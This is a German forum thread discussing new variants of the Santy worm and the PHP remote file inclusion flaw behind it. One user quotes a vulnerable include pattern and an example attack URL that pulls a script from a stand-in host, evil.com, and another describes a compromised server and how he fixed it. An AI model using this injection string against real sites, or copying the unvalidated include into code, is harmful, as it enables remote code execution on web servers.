Du verwendest einen veralteten Browser. Es ist möglich, dass diese oder andere Websites nicht korrekt angezeigt werden. Du solltest ein Upgrade durchführen oder einen alternativen Browser verwenden.
Vor wenigen Tagen berichteten wir über den Wurm „Santy“, der über eine Sicherheitslücke in der Forensoftware phpBB Webseiten lahm legte. Nun sind neue Varianten des Wurms im Umlauf, die auch normale PHP-Scripte angreifen.
hört sich an als würde der wurm/virus sich über remote control den zugang verschaffen bzw. mit einem buffer overflow bösartigen code ausführt, wenn der server gerade infos austauscht, aber kenn mich ned so gut aus
Hört sich eher nach dem alt-bekannten "allow_url_fopen" Prinzip an.
Einige Seiten benutzen sowas hier
PHP:
include "$cat.inc.php";
Wobei $cat aus den $_GET kommt.
$cat sollte eigentlich sowas wie "news" oder "page1" sein...
Wenn allow_url_open in den Settings an ist können allerdings auch entfernte Dateien included werden.
Etwa: "http://some.url/attacked.php?cat=http://evil.com/script.inc?" würde dann das script "http://evil.com/script.inc" mit dem QueryString ".inc.php" includen, also den bösen code.
Obs das wirklich ist, weiß ich nicht.
Aber das hier ist hinreichend bekannt und leicht zu nutzen, wenn der angegriffene code schlecht ist, also nicht die Eingaben ausreichend validiert.
Bin Leider betroffen mit einem SuSe 9.0 Rootserver.
ich hatte meine Server durchgesehen da ich aufeinmal einen Traffic von fast 11GB <Eingehend> auf den Server hatte , und dabei ist mir folgender
Prozess aufgefallen
/usr/local/sbin/httpd - spy
Dieses deutete dann nach einer Suche auf folgendes hin.
Wer Zugriff auf die Konfiguration des Web-Servers hat, kann sich durch Abschalten der Option allow_url_fopen in der Konfigurationsdatei php.ini gegen solche Attacken schützen.
Habe ich den Apache runtergenommen, und den Server rebootet ..
Danach alles wie gewohnt gestartet...
Seitdem ist erstmal ruhe...
Ich hoffe das bleibt so, und es wird Patches geben.
